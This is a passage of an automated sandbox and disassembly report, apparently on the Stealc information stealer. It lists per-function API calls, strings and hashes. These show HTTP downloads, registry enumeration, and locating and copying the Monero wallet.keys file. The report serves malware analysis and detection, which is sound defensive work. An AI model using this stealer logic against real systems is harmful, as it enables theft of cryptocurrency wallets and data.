Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00694915
StrCmpCA.SHLWAPI(?,00A0D880), ref: 0069493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00694ABA
lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,006B0DDB,00000000,?,?,00000000,?,",00000000,?,00A0D8D0), ref: 00694DE8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00694E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00694E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00694E49
InternetCloseHandle.WININET(00000000), ref: 00694EAD
InternetCloseHandle.WININET(00000000), ref: 00694EC5
HttpOpenRequestA.WININET(00000000,00A0D8A0,?,00A11BC8,00000000,00000000,00400100,00000000), ref: 00694B15

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

InternetCloseHandle.WININET(00000000), ref: 00694ECF

Strings

------, xrefs: 006949BD
", xrefs: 00694BF2
------, xrefs: 00694C69
------, xrefs: 00694B28
", xrefs: 00694D33

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 2402878923-2180234286
Opcode ID: a8a4fd82567a6325e08a70892fe55bb07556cc31f5bc16f76c0a3d781ca98e54
Instruction ID: 27312c19a6e58bc3d9b7a82d810b968978df1e94c97fbdf52b73f32fecc61a9c
Opcode Fuzzy Hash: a8a4fd82567a6325e08a70892fe55bb07556cc31f5bc16f76c0a3d781ca98e54
Instruction Fuzzy Hash: 7D12EC71911118AADB95FB90DC92FEEB37ABF16300F50419EB10662091EF742F49CF6A

Function 006A8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

RegOpenKeyExA.KERNEL32(00000000,00A0E270,00000000,00020019,00000000,006B05B6), ref: 006A83A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006A8426
wsprintfA.USER32 ref: 006A8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 006A847B
RegCloseKey.ADVAPI32(00000000), ref: 006A848C
RegCloseKey.ADVAPI32(00000000), ref: 006A8499

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Strings

%s\%s, xrefs: 006A844D
- , xrefs: 006A85A3
?, xrefs: 006A837A

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 8520e7efad4461c14efd91e73f69af182522a47a29f32275d98007754af8d170
Instruction ID: fadc0fbe4fe1e44b6edd13b6b4d1ef64e57e55f91ec3e90f31ecd1ecab1e8c42
Opcode Fuzzy Hash: 8520e7efad4461c14efd91e73f69af182522a47a29f32275d98007754af8d170
Instruction Fuzzy Hash: CE811F719111189FEB68EB50CC95FEA77B9FF08700F108299E109A6180DF75AF85CF95

Function 00696280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006947B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 006947EA
Part of subcall function 006947B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00694801
Part of subcall function 006947B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00694818
Part of subcall function 006947B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00694839
Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

InternetOpenA.WININET(006B0DFE,00000001,00000000,00000000,00000000), ref: 006962E1
StrCmpCA.SHLWAPI(?,00A0D880), ref: 00696303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00696335
HttpOpenRequestA.WININET(00000000,GET,?,00A11BC8,00000000,00000000,00400100,00000000), ref: 00696385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006963BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006963D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006963FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0069646D
InternetCloseHandle.WININET(00000000), ref: 006964EF
InternetCloseHandle.WININET(00000000), ref: 006964F9
InternetCloseHandle.WININET(00000000), ref: 00696503

Strings

GET, xrefs: 0069637C
ERROR, xrefs: 00696407
ERROR, xrefs: 006964C9

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3074848878-2509457195
Opcode ID: af1d0a55132c773f7a5e8f0d5869eee3b3b066522009fca4f66f3c10d4f84899
Instruction ID: 42940420df6eaeb7465e7e40fe4235d06442b346400c8e8ef7f7c02aa619dab1
Opcode Fuzzy Hash: af1d0a55132c773f7a5e8f0d5869eee3b3b066522009fca4f66f3c10d4f84899
Instruction Fuzzy Hash: 88715B71A00318ABDF64EBE0CC49BEE77BABB45700F108199F50A6B590DBB46E85CF51

Function 006A5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA820: lstrlenA.KERNEL32(00000000,?,?,006A5B54,006B0ADB,006B0ADA,?,?,006A6B16,00000000,?,00A01348,?,006B110C,?,00000000), ref: 006AA82B
Part of subcall function 006AA820: lstrcpy.KERNEL32(k,00000000), ref: 006AA885

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A5644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A56A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A5857

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006A51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A5228

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

Part of subcall function 006A52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A5318
Part of subcall function 006A52C0: lstrlenA.KERNEL32(00000000), ref: 006A532F
Part of subcall function 006A52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 006A5364
Part of subcall function 006A52C0: lstrlenA.KERNEL32(00000000), ref: 006A5383
Part of subcall function 006A52C0: strtok.MSVCRT(00000000,?), ref: 006A539E
Part of subcall function 006A52C0: lstrlenA.KERNEL32(00000000), ref: 006A53AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A5940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A5A0C
Sleep.KERNEL32(0000EA60), ref: 006A5A1B

Strings

ERROR, xrefs: 006A59FE
ERROR, xrefs: 006A5932
ERROR, xrefs: 006A5636
ERROR, xrefs: 006A5849
ERROR, xrefs: 006A577D
ERROR, xrefs: 006A5693

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3630751533-2791005934
Opcode ID: c0b0fcb8cea62d170d478485984d631a73903023d11bc410e75af0be9df48bea
Instruction ID: 804c03c5f368dacde76bad10e93c683e6ab4e23c03cb2280c0fcb0ea65f367ba
Opcode Fuzzy Hash: c0b0fcb8cea62d170d478485984d631a73903023d11bc410e75af0be9df48bea
Instruction Fuzzy Hash: 0CE12071910104AACB98FBE0DC52AFE737AAF56300F50856EB50766191EF34AE09CF96

Function 00691310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00691327

Part of subcall function 006912A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 006912B4
Part of subcall function 006912A0: HeapAlloc.KERNEL32(00000000), ref: 006912BB
Part of subcall function 006912A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 006912D7
Part of subcall function 006912A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 006912F5
Part of subcall function 006912A0: RegCloseKey.ADVAPI32(?), ref: 006912FF

lstrcatA.KERNEL32(?,00000000), ref: 0069134F
lstrlenA.KERNEL32(?), ref: 0069135C
lstrcatA.KERNEL32(?,.keys), ref: 00691377

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

Part of subcall function 006A8B60: GetSystemTime.KERNEL32(?,00A04790,006B05AE,?,?,?,?,?,?,?,?,?,00694963,?,00000014), ref: 006A8B86

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00691465

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
Part of subcall function 006999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
Part of subcall function 006999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
Part of subcall function 006999C0: ReadFile.KERNEL32(000000FF,?,00000000,006A02E7,00000000), ref: 00699A5A
Part of subcall function 006999C0: LocalFree.KERNEL32(006A02E7), ref: 00699A90
Part of subcall function 006999C0: CloseHandle.KERNEL32(000000FF), ref: 00699A9A

DeleteFileA.KERNEL32(00000000), ref: 006914EF
memset.MSVCRT ref: 00691516

Strings

wallet_path, xrefs: 00691330
\Monero\wallet.keys, xrefs: 0069138D
.keys, xrefs: 0069136B
SOFTWARE\monero-project\monero-core, xrefs: 00691335

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1930502592-218353709
Opcode ID: 2bca2aeb9787554d10dc9802384bd7b2a0594989f9f0ba2fe908f1ce8e4fecc6
Instruction ID: de631951c0400e00ababf259e23d99f5abb8a3adb688d79ab5a1e9d53fbbe9da
Opcode Fuzzy Hash: 2bca2aeb9787554d10dc9802384bd7b2a0594989f9f0ba2fe908f1ce8e4fecc6
Instruction Fuzzy Hash: 815144B19101195BCB95FBA0DD91AEE737DAF55300F40419DB60A62082EF345F89CFAA

Function 006960A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006947B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 006947EA
Part of subcall function 006947B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00694801
Part of subcall function 006947B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00694818
Part of subcall function 006947B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00694839
Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849

InternetOpenA.WININET(006B0DF7,00000001,00000000,00000000,00000000), ref: 0069610F
StrCmpCA.SHLWAPI(?,00A0D880), ref: 00696147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0069618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006961B3
InternetReadFile.WININET(a+j,?,00000400,?), ref: 006961DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0069620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00696249
InternetCloseHandle.WININET(a+j), ref: 00696253
InternetCloseHandle.WININET(00000000), ref: 00696260

Strings

a+j, xrefs: 006960B0, 0069617F, 00696266, 00696124, 006960B3
a+j, xrefs: 0069624F, 006961D8, 006961DB, 00696252

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID: a+j$a+j
API String ID: 4287319946-3004624487
Opcode ID: cfbfbc0c6332a9f2c0490644c361106aed7c305602879e207f44aee2182adeb3
Instruction ID: 9c9f2e1b7c49c983b025533d297a3c2747b61fc9c8a7ca5558d9af88185fccec
Opcode Fuzzy Hash: cfbfbc0c6332a9f2c0490644c361106aed7c305602879e207f44aee2182adeb3
Instruction Fuzzy Hash: 54515FB1A00218ABDF24EFA0DC45BEE77B9FB44701F108199B605A71C0DB746E85CF95

Function 006A70D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 006A70DE

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

OpenProcess.KERNEL32(001FFFFF,00000000,006A730D,006B05BD), ref: 006A711C
memset.MSVCRT ref: 006A716A
??_V@YAXPAX@Z.MSVCRT(?), ref: 006A72BE

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 006A718C
sj, xrefs: 006A7111
sj, xrefs: 006A72AE, 006A7179, 006A717C

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
